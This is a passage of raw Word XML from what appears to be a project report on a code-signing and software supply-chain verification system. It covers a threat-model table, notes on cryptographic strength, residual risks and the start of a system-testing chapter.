        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No version policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Revoked list, minimum version, anti-rollback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>REVOKED / REPLAY_BLOCKED</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Manifest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Edit hash, version or provenance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unsigned metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Manifest signature covers all fields</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>INVALID_SIGNATURE</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Trust policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Tampering, Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Add key, un-revoke, replay old policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Registry controls trust data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Root signature, pinned root, expiry, monotonic version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>INVALID_TRUST_POLICY</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CI/CD credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>EoP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Use leaked token to sign</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Signing needs only a token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>RBAC + TOTP MFA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>UNAUTHORIZED_SIGNER</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Audit evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Edit or delete log rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Mutable logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SHA-256 hash chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Chain BROKEN detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Denial of service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Break or flood verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1531"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Fail-closed gate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No unverified deploy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6.3 Strength of the Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ed25519</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides about 128-bit security; forging a signature without the private key is computationally infeasible [5].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SHA-256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides 128-bit collision resistance and 256-bit pre-image resistance [4], far beyond any feasible attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>TLS 1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides forward secrecy (ephemeral ECDHE) and removes legacy ciphers and renegotiation [7].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Domain-separated, canonical signing inputs prevent cross-protocol and encoding-ambiguity attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6.4 Residual Risks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Stolen valid key before revocation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: signatures remain valid until a new trust policy is published. Mitigated by HSM/KMS, MFA, audit monitoring, the customer content scan (heuristic) and fast revocation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Malicious source before build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SolarWinds-style [20]): a signature proves </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>who</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> built something, not that the source is benign. Code review, branch protection, provenance and reproducible builds reduce the risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Trust bootstrap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: the root public key must reach customers authentically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Prototype key storage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is software-based; production must use an HSM or cloud KMS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 7</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>SYSTEM TESTING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>7.1 Testing Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Automated tests (pytest)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: 25 tests covering the nine required cases and extra conditions (trust-policy rollback and tampering, provenance tampering, TLS downgrade, audit-chain tampering, key protection, FAR).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Attack simulation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: 14 end-to-end scenarios executed by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>attack_simulation/run_all.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Continuous integration</w:t>
      </w:r>
